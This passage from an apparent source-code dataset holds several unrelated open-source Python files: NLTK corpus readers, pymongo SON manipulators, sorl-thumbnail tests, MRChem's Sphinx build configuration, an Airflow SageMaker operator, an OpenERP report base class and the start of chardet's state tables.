``pickle.dump``). One use case for this class is to store the
result of running feature detection on a corpus to disk. This can
be useful when performing feature detection is expensive (so we
don't want to repeat it); but the corpus is too large to store in
memory. The following example illustrates this technique:
.. doctest::
:options: +SKIP
>>> from nltk.corpus.reader.util import PickleCorpusView
>>> from nltk.util import LazyMap
>>> feature_corpus = LazyMap(detect_features, corpus)
>>> PickleCorpusView.write(feature_corpus, some_fileid)
>>> pcv = PickleCorpusView(some_fileid)
"""
BLOCK_SIZE = 100
PROTOCOL = -1
def __init__(self, fileid, delete_on_gc=False):
"""
Create a new corpus view that reads the pickle corpus
``fileid``.
:param delete_on_gc: If true, then ``fileid`` will be deleted
whenever this object gets garbage-collected.
"""
self._delete_on_gc = delete_on_gc
StreamBackedCorpusView.__init__(self, fileid)
def read_block(self, stream):
result = []
for i in range(self.BLOCK_SIZE):
try: result.append(pickle.load(stream))
except EOFError: break
return result
def __del__(self):
"""
If ``delete_on_gc`` was set to true when this
``PickleCorpusView`` was created, then delete the corpus view's
fileid. (This method is called whenever a
``PickledCorpusView`` is garbage-collected.
"""
if getattr(self, '_delete_on_gc'):
if os.path.exists(self._fileid):
try: os.remove(self._fileid)
except (OSError, IOError): pass
self.__dict__.clear() # make the garbage collector's job easier
@classmethod
def write(cls, sequence, output_file):
if isinstance(output_file, basestring):
output_file = open(output_file, 'wb')
for item in sequence:
pickle.dump(item, output_file, cls.PROTOCOL)
@classmethod
def cache_to_tempfile(cls, sequence, delete_on_gc=True):
"""
Write the given sequence to a temporary file as a pickle
corpus; and then return a ``PickleCorpusView`` view for that
temporary corpus file.
:param delete_on_gc: If true, then the temporary file will be
deleted whenever this object gets garbage-collected.
"""
try:
fd, output_file_name = tempfile.mkstemp('.pcv', 'nltk-')
output_file = os.fdopen(fd, 'wb')
cls.write(sequence, output_file)
output_file.close()
return PickleCorpusView(output_file_name, delete_on_gc)
except (OSError, IOError) as e:
raise ValueError('Error while creating temp file: %s' % e)
######################################################################
#{ Block Readers
######################################################################
def read_whitespace_block(stream):
toks = []
for i in range(20): # Read 20 lines at a time.
toks.extend(stream.readline().split())
return toks
def read_wordpunct_block(stream):
toks = []
for i in range(20): # Read 20 lines at a time.
toks.extend(wordpunct_tokenize(stream.readline()))
return toks
def read_line_block(stream):
toks = []
for i in range(20):
line = stream.readline()
if not line: return toks
toks.append(line.rstrip('\n'))
return toks
def read_blankline_block(stream):
s = ''
while True:
line = stream.readline()
# End of file:
if not line:
if s: return [s]
else: return []
# Blank line:
elif line and not line.strip():
if s: return [s]
# Other line:
else:
s += line
def read_alignedsent_block(stream):
s = ''
while True:
line = stream.readline()
if line[0] == '=' or line[0] == '\n' or line[:2] == '\r\n':
continue
# End of file:
if not line:
if s: return [s]
else: return []
# Other line:
else:
s += line
if re.match('^\d+-\d+', line) is not None:
return [s]
def read_regexp_block(stream, start_re, end_re=None):
"""
Read a sequence of tokens from a stream, where tokens begin with
lines that match ``start_re``. If ``end_re`` is specified, then
tokens end with lines that match ``end_re``; otherwise, tokens end
whenever the next line matching ``start_re`` or EOF is found.
"""
# Scan until we find a line matching the start regexp.
while True:
line = stream.readline()
if not line: return [] # end of file.
if re.match(start_re, line): break
# Scan until we find another line matching the regexp, or EOF.
lines = [line]
while True:
oldpos = stream.tell()
line = stream.readline()
# End of file:
if not line:
return [''.join(lines)]
# End of token:
if end_re is not None and re.match(end_re, line):
return [''.join(lines)]
# Start of new token: backup to just before it starts, and
# return the token we've already collected.
if end_re is None and re.match(start_re, line):
stream.seek(oldpos)
return [''.join(lines)]
# Anything else is part of the token.
lines.append(line)
def read_sexpr_block(stream, block_size=16384, comment_char=None):
"""
Read a sequence of s-expressions from the stream, and leave the
stream's file position at the end the last complete s-expression
read. This function will always return at least one s-expression,
unless there are no more s-expressions in the file.
If the file ends in in the middle of an s-expression, then that
incomplete s-expression is returned when the end of the file is
reached.
:param block_size: The default block size for reading. If an
s-expression is longer than one block, then more than one
block will be read.
:param comment_char: A character that marks comments. Any lines
that begin with this character will be stripped out.
(If spaces or tabs precede the comment character, then the
line will not be stripped.)
"""
start = stream.tell()
block = stream.read(block_size)
encoding = getattr(stream, 'encoding', None)
assert encoding is not None or isinstance(block, str)
if encoding not in (None, 'utf-8'):
import warnings
warnings.warn('Parsing may fail, depending on the properties '
'of the %s encoding!' % encoding)
# (e.g., the utf-16 encoding does not work because it insists
# on adding BOMs to the beginning of encoded strings.)
if comment_char:
COMMENT = re.compile('(?m)^%s.*$' % re.escape(comment_char))
while True:
try:
# If we're stripping comments, then make sure our block ends
# on a line boundary; and then replace any comments with
# space characters. (We can't just strip them out -- that
# would make our offset wrong.)
if comment_char:
block += stream.readline()
block = re.sub(COMMENT, _sub_space, block)
# Read the block.
tokens, offset = _parse_sexpr_block(block)
# Skip whitespace
offset = re.compile(r'\s*').search(block, offset).end()
# Move to the end position.
if encoding is None:
stream.seek(start+offset)
else:
stream.seek(start+len(block[:offset].encode(encoding)))
# Return the list of tokens we processed
return tokens
except ValueError as e:
if e.args[0] == 'Block too small':
next_block = stream.read(block_size)
if next_block:
block += next_block
continue
else:
# The file ended mid-sexpr -- return what we got.
return [block.strip()]
else: raise
def _sub_space(m):
"""Helper function: given a regexp match, return a string of
spaces that's the same length as the matched string."""
return ' '*(m.end()-m.start())
def _parse_sexpr_block(block):
tokens = []
start = end = 0
while end < len(block):
m = re.compile(r'\S').search(block, end)
if not m:
return tokens, end
start = m.start()
# Case 1: sexpr is not parenthesized.
if m.group() != '(':
m2 = re.compile(r'[\s(]').search(block, start)
if m2:
end = m2.start()
else:
if tokens: return tokens, end
raise ValueError('Block too small')
# Case 2: parenthesized sexpr.
else:
nesting = 0
for m in re.compile(r'[()]').finditer(block, start):
if m.group()=='(': nesting += 1
else: nesting -= 1
if nesting == 0:
end = m.end()
break
else:
if tokens: return tokens, end
raise ValueError('Block too small')
tokens.append(block[start:end])
return tokens, end
######################################################################
#{ Finding Corpus Items
######################################################################
def find_corpus_fileids(root, regexp):
if not isinstance(root, PathPointer):
raise TypeError('find_corpus_fileids: expected a PathPointer')
regexp += '$'
# Find fileids in a zipfile: scan the zipfile's namelist. Filter
# out entries that end in '/' -- they're directories.
if isinstance(root, ZipFilePathPointer):
fileids = [name[len(root.entry):] for name in root.zipfile.namelist()
if not name.endswith('/')]
items = [name for name in fileids if re.match(regexp, name)]
return sorted(items)
# Find fileids in a directory: use os.walk to search all (proper
# or symlinked) subdirectories, and match paths against the regexp.
elif isinstance(root, FileSystemPathPointer):
items = []
# workaround for py25 which doesn't support followlinks
kwargs = {}
if not py25():
kwargs = {'followlinks': True}
for dirname, subdirs, fileids in os.walk(root.path, **kwargs):
prefix = ''.join('%s/' % p for p in _path_from(root.path, dirname))
items += [prefix+fileid for fileid in fileids
if re.match(regexp, prefix+fileid)]
# Don't visit svn directories:
if '.svn' in subdirs: subdirs.remove('.svn')
return sorted(items)
else:
raise AssertionError("Don't know how to handle %r" % root)
def _path_from(parent, child):
if os.path.split(parent)[1] == '':
parent = os.path.split(parent)[0]
path = []
while parent != child:
child, dirname = os.path.split(child)
path.insert(0, dirname)
assert os.path.split(child)[0] != child
return path
######################################################################
#{ Paragraph structure in Treebank files
######################################################################
def tagged_treebank_para_block_reader(stream):
# Read the next paragraph.
para = ''
while True:
line = stream.readline()
# End of paragraph:
if re.match('======+\s*$', line):
if para.strip(): return [para]
# End of file:
elif line == '':
if para.strip(): return [para]
else: return []
# Content line:
else:
para += line
| apache-2.0 |
akhilari7/pa-dude | lib/python2.7/site-packages/pymongo/son_manipulator.py | 64 | 6180 | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manipulators that can edit SON objects as they enter and exit a database.
New manipulators should be defined as subclasses of SONManipulator and can be
installed on a database by calling
`pymongo.database.Database.add_son_manipulator`."""
import collections
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.son import SON
class SONManipulator(object):
"""A base son manipulator.
This manipulator just saves and restores objects without changing them.
"""
def will_copy(self):
"""Will this SON manipulator make a copy of the incoming document?
Derived classes that do need to make a copy should override this
method, returning True instead of False. All non-copying manipulators
will be applied first (so that the user's document will be updated
appropriately), followed by copying manipulators.
"""
return False
def transform_incoming(self, son, collection):
"""Manipulate an incoming SON object.
:Parameters:
- `son`: the SON object to be inserted into the database
- `collection`: the collection the object is being inserted into
"""
if self.will_copy():
return SON(son)
return son
def transform_outgoing(self, son, collection):
"""Manipulate an outgoing SON object.
:Parameters:
- `son`: the SON object being retrieved from the database
- `collection`: the collection this object was stored in
"""
if self.will_copy():
return SON(son)
return son
class ObjectIdInjector(SONManipulator):
"""A son manipulator that adds the _id field if it is missing.
.. versionchanged:: 2.7
ObjectIdInjector is no longer used by PyMongo, but remains in this
module for backwards compatibility.
"""
def transform_incoming(self, son, collection):
"""Add an _id field if it is missing.
"""
if not "_id" in son:
son["_id"] = ObjectId()
return son
# This is now handled during BSON encoding (for performance reasons),
# but I'm keeping this here as a reference for those implementing new
# SONManipulators.
class ObjectIdShuffler(SONManipulator):
"""A son manipulator that moves _id to the first position.
"""
def will_copy(self):
"""We need to copy to be sure that we are dealing with SON, not a dict.
"""
return True
def transform_incoming(self, son, collection):
"""Move _id to the front if it's there.
"""
if not "_id" in son:
return son
transformed = SON({"_id": son["_id"]})
transformed.update(son)
return transformed
class NamespaceInjector(SONManipulator):
"""A son manipulator that adds the _ns field.
"""
def transform_incoming(self, son, collection):
"""Add the _ns field to the incoming object
"""
son["_ns"] = collection.name
return son
class AutoReference(SONManipulator):
"""Transparently reference and de-reference already saved embedded objects.
This manipulator should probably only be used when the NamespaceInjector is
also being used, otherwise it doesn't make too much sense - documents can
only be auto-referenced if they have an *_ns* field.
NOTE: this will behave poorly if you have a circular reference.
TODO: this only works for documents that are in the same database. To fix
this we'll need to add a DatabaseInjector that adds *_db* and then make
use of the optional *database* support for DBRefs.
"""
def __init__(self, db):
self.database = db
def will_copy(self):
"""We need to copy so the user's document doesn't get transformed refs.
"""
return True
def transform_incoming(self, son, collection):
"""Replace embedded documents with DBRefs.
"""
def transform_value(value):
if isinstance(value, collections.MutableMapping):
if "_id" in value and "_ns" in value:
return DBRef(value["_ns"], transform_value(value["_id"]))
else:
return transform_dict(SON(value))
elif isinstance(value, list):
return [transform_value(v) for v in value]
return value
def transform_dict(object):
for (key, value) in object.items():
object[key] = transform_value(value)
return object
return transform_dict(SON(son))
def transform_outgoing(self, son, collection):
"""Replace DBRefs with embedded documents.
"""
def transform_value(value):
if isinstance(value, DBRef):
return self.database.dereference(value)
elif isinstance(value, list):
return [transform_value(v) for v in value]
elif isinstance(value, collections.MutableMapping):
return transform_dict(SON(value))
return value
def transform_dict(object):
for (key, value) in object.items():
object[key] = transform_value(value)
return object
return transform_dict(SON(son))
# TODO make a generic translator for custom types. Take encode, decode,
# should_encode and should_decode functions and just encode and decode where
# necessary. See examples/custom_type.py for where this would be useful.
# Alternatively it could take a should_encode, to_binary, from_binary and
# binary subtype.
| mit |
chriscauley/sorl-thumbnail | tests/thumbnail_tests/test_parsers.py | 17 | 1229 | # -*- coding: utf-8 -*-
import unittest
from sorl.thumbnail.helpers import ThumbnailError
from sorl.thumbnail.parsers import parse_crop, parse_geometry
class CropParserTestCase(unittest.TestCase):
def test_alias_crop(self):
crop = parse_crop('center', (500, 500), (400, 400))
self.assertEqual(crop, (50, 50))
crop = parse_crop('right', (500, 500), (400, 400))
self.assertEqual(crop, (100, 50))
def test_percent_crop(self):
crop = parse_crop('50% 0%', (500, 500), (400, 400))
self.assertEqual(crop, (50, 0))
crop = parse_crop('10% 80%', (500, 500), (400, 400))
self.assertEqual(crop, (10, 80))
def test_px_crop(self):
crop = parse_crop('200px 33px', (500, 500), (400, 400))
self.assertEqual(crop, (100, 33))
def test_bad_crop(self):
self.assertRaises(ThumbnailError, parse_crop, '-200px', (500, 500), (400, 400))
class GeometryParserTestCase(unittest.TestCase):
def test_geometry(self):
g = parse_geometry('222x30')
self.assertEqual(g, (222, 30))
g = parse_geometry('222')
self.assertEqual(g, (222, None))
g = parse_geometry('x999')
self.assertEqual(g, (None, 999))
| bsd-3-clause |
MRChemSoft/mrchem | doc/conf.py | 1 | 16413 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MRChem documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 26 15:18:26 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.autosectionlabel',
'sphinxcontrib.bibtex',
'breathe',
'recommonmark'
]
breathe_projects = { 'MRChem': 'xml' }
breathe_default_project = 'MRChem'
breathe_default_members = ('members', 'protected-members', 'private-members')
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'MRChem'
copyright = '2019, Stig Rune Jensen, Luca Frediani, Peter Wind, Roberto Di Remigio, Magnar Bjorgve, Gabriel Gerez'
author = 'Stig Rune Jensen, Luca Frediani, Peter Wind, Roberto Di Remigio, Magnar Bjorgve, Gabriel Gerez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Read version from file
# Get project version
with open('../VERSION') as f:
content = f.read().replace('\n', '')
mrchem_version = re.search('[0-9]\.[0-9]\.[0-9]', content).group(0)
major = mrchem_version.split('.')[0]
minor = mrchem_version.split('.')[1]
patch = mrchem_version.split('.')[2]
version = mrchem_version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build','**/mwfilters/**']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'gfx/logo.jpg'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'MRChemdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'MRChem.tex', 'MRChem Documentation',
'Stig Rune Jensen, Luca Frediani, Peter Wind', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'mrchem', 'MRChem Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'MRChem', 'MRChem Documentation',
author, 'MRChem', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def which(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def run_doxygen(folder):
"""Run the doxygen make command in the designated folder"""
import subprocess
try:
retcode = subprocess.call("cd %s; doxygen" % folder, shell=True)
if retcode < 0:
sys.stderr.write("doxygen terminated by signal %s" % (-retcode))
except OSError as e:
sys.stderr.write("doxygen execution failed: %s" % e)
def generate_doxygen_xml(app):
"""Run the doxygen make commands if we're on the ReadTheDocs server"""
read_the_docs_build = os.environ.get('READTHEDOCS', None) == 'True'
if read_the_docs_build:
run_doxygen(os.getcwd())
def remove(obj):
import os
import shutil
if os.path.isdir(obj):
try:
shutil.rmtree(obj)
except OSError:
pass
else:
try:
os.remove(obj)
except OSError:
pass
def configure_file(rep, fname, **kwargs):
import os
import re
r''' Configure a file.
:param rep:
a (placeholder : replacement) dictionary
:param fname:
name of the file to be configured, without suffix
:param \**kwargs:
See below
:Keyword arguments:
* *in_path* -- directory for the unconfigured file
* *suffix* -- suffix of the unconfigured file, with separators
* *prefix* -- prefix for the configured file
* *out_path* -- directory for the configured file
'''
in_path = kwargs.get('in_path', os.getcwd())
suffix = kwargs.get('suffix', '.in')
out_path = kwargs.get('out_path', in_path)
prefix = kwargs.get('prefix', '')
fname_in = fname + suffix
f = open(os.path.join(in_path, fname_in), 'r')
filedata = f.read()
f.close()
rep = dict((re.escape(k), v) for k, v in list(rep.items()))
pattern = re.compile("|".join(list(rep.keys())))
filedata = pattern.sub(lambda m: rep[re.escape(m.group(0))], filedata)
fname_out = prefix + fname
f = open(os.path.join(out_path, fname_out), 'w+')
f.write(filedata)
f.close()
def generate_bar_charts(mod_dir, dir_lang, savedir):
r'''Generate lines-of-code bar charts.
:param mod_dir:
location of the cloc_tools module
:param dir_lang:
a (directory : language) dictionary
:param savedir:
location of the YAML files
'''
import sys
sys.path.append(mod_dir)
from cloc_tools import bar_chart
# Generate scripts and list of scripts (absolute paths)
list_of_scripts = [bar_chart(root_dir, language, savedir) for root_dir, language in list(dir_lang.items())]
# Generate charts
for fname in list_of_scripts:
exec(compile(open(fname).read(), fname, 'exec'))
def setup(app):
from pygments.lexers import get_lexer_for_filename
# We first need to define some directories:
# project_root_dir -- the root of the project
# project_src_dir -- source code location: os.path.join(project_root_dir, 'src')
# project_doc_dir -- .rst location: os.path.join(project_root_dir, 'doc')
if (os.environ.get('READTHEDOCS', None) == 'True'):
project_root_dir = os.path.abspath(os.pardir)
project_doc_dir = os.getcwd()
project_src_dir = os.path.join(project_root_dir, 'src')
else:
project_root_dir = os.getcwd()
project_doc_dir = os.path.join(project_root_dir, 'doc')
project_src_dir = os.path.join(project_root_dir, 'src')
print(('Project root directory {}'.format(project_root_dir)))
print(('Project doc directory {}'.format(project_doc_dir)))
print(('Project src directory {}'.format(project_src_dir)))
# Clean up leftovers
print('Clean up leftovers from previous build')
[remove(os.path.join(project_doc_dir, x.strip())) for x in open(os.path.join(project_doc_dir, '.gitignore'))]
# Configure Doxyfile.in
dot = which('dot')
if dot is not None:
dot_path = os.path.split(which('dot'))[0]
else:
dot_path = ''
rep = { '@PROJECT_VERSION_MAJOR@' : major,
'@PROJECT_VERSION_MINOR@' : minor,
'@PROJECT_VERSION_PATCH@' : patch,
'@PROJECT_SOURCE_DIR@' : project_root_dir,
'@DOXYGEN_DOT_PATH@' : dot_path
}
configure_file(rep, 'Doxyfile', in_path=project_doc_dir, suffix='.in')
# Configure cloc_tools.py.in
rep = { '@PYTHON_EXECUTABLE@' : sys.executable,
'@PROJECT_SOURCE_DIR@' : project_root_dir,
'@PROJECT_BINARY_DIR@' : project_root_dir,
'@PERL_EXECUTABLE@' : which('perl')
}
# tup = (os.walk(project_src_dir))
# for root, dirs, files in os.walk(project_src_dir):
# if 'mwfilters' in dirs:
# dirs.remove('mwfilters')
# print root, dirs
# Generate directories list (full paths), remove bin using filter
# d = [os.path.join(root, x) for root, dirs, _ in os.walk(project_src_dir) for x in dirs]
# exclude_dirs = [os.path.join(project_src_dir,x) for x in ['mrcpp/mwfilters']]
# d = filter(lambda y: y not in exclude_dirs, d)
# f = [filter(lambda x: os.path.isfile(os.path.join(l, x)), os.listdir(l)) for l in d]
#
# allfiles = []
# for idx in range(len(f)):
# f[idx] = filter(lambda y: y != 'CMakeLists.txt', f[idx])
# f[idx] = filter(lambda y: not y.endswith('.in'), f[idx])
# allfiles.extend(f[idx])
#
# # Apply map to get language name
# l = [get_lexer_for_filename(x).name for x in allfiles]
#
# # # Finally zip d and f into the dir_lang dictionary
# dir_lang = dict(zip(d, l))
#
# # generate_bar_charts(project_doc_dir, dir_lang, project_doc_dir)
if (os.environ.get('READTHEDOCS', None) == 'True'):
# Add hook for building doxygen xml when needed
app.connect("builder-inited", generate_doxygen_xml)
else:
run_doxygen(project_doc_dir)
# configure sphinxcontrib.bibtex
bibtex_bibfiles = ["bibliography.bib"]
| lgpl-3.0 |
airbnb/airflow | airflow/providers/amazon/aws/operators/sagemaker_model.py | 7 | 2337 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.base_aws import AwsBaseHook
from airflow.providers.amazon.aws.operators.sagemaker_base import SageMakerBaseOperator
from airflow.utils.decorators import apply_defaults
class SageMakerModelOperator(SageMakerBaseOperator):
"""
Create a SageMaker model.
This operator returns The ARN of the model created in Amazon SageMaker
:param config: The configuration necessary to create a model.
For details of the configuration parameter see :py:meth:`SageMaker.Client.create_model`
:type config: dict
:param aws_conn_id: The AWS connection ID to use.
:type aws_conn_id: str
"""
@apply_defaults
def __init__(self, *, config, **kwargs):
super().__init__(config=config, **kwargs)
self.config = config
def expand_role(self) -> None:
if 'ExecutionRoleArn' in self.config:
hook = AwsBaseHook(self.aws_conn_id, client_type='iam')
self.config['ExecutionRoleArn'] = hook.expand_role(self.config['ExecutionRoleArn'])
def execute(self, context) -> dict:
self.preprocess_config()
self.log.info('Creating SageMaker Model %s.', self.config['ModelName'])
response = self.hook.create_model(self.config)
if response['ResponseMetadata']['HTTPStatusCode'] != 200:
raise AirflowException('Sagemaker model creation failed: %s' % response)
else:
return {'Model': self.hook.describe_model(self.config['ModelName'])}
| apache-2.0 |
BizzCloud/PosBox | openerp/report/render/render.py | 457 | 2524 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Why doing some multi-thread instead of using OSE capabilities ?
# For progress bar.
#
# Add a transparant multi-thread layer to all report rendering layers
#
# TODO: method to stock on the disk
class render(object):
""" Represents a report job being rendered.
@param bin_datas a dictionary of name:<binary content> of images etc.
@param path the path in which binary files can be discovered, useful
for components (images) of the report. It can be:
- a string, relative or absolute path to images
- a list, containing strings of paths.
If a string is absolute path, it will be opened as such, else
it will be passed to tools.file_open() which also considers zip
addons.
Reporting classes must subclass this class and redefine the __init__ and
_render methods (not the other methods).
"""
def __init__(self, bin_datas=None, path='.'):
self.done = False
if bin_datas is None:
self.bin_datas = {}
else:
self.bin_datas = bin_datas
self.path = path
def _render(self):
return None
def render(self):
self.done = False
self._result = self._render()
self.done = True
return True
def is_done(self):
return self.done
def get(self):
if self.is_done():
return self._result
else:
return None
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
LarryHillyer/PoolHost | PoolHost/env/Lib/site-packages/pip/_vendor/requests/packages/chardet/escsm.py | 2930 | 7839 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
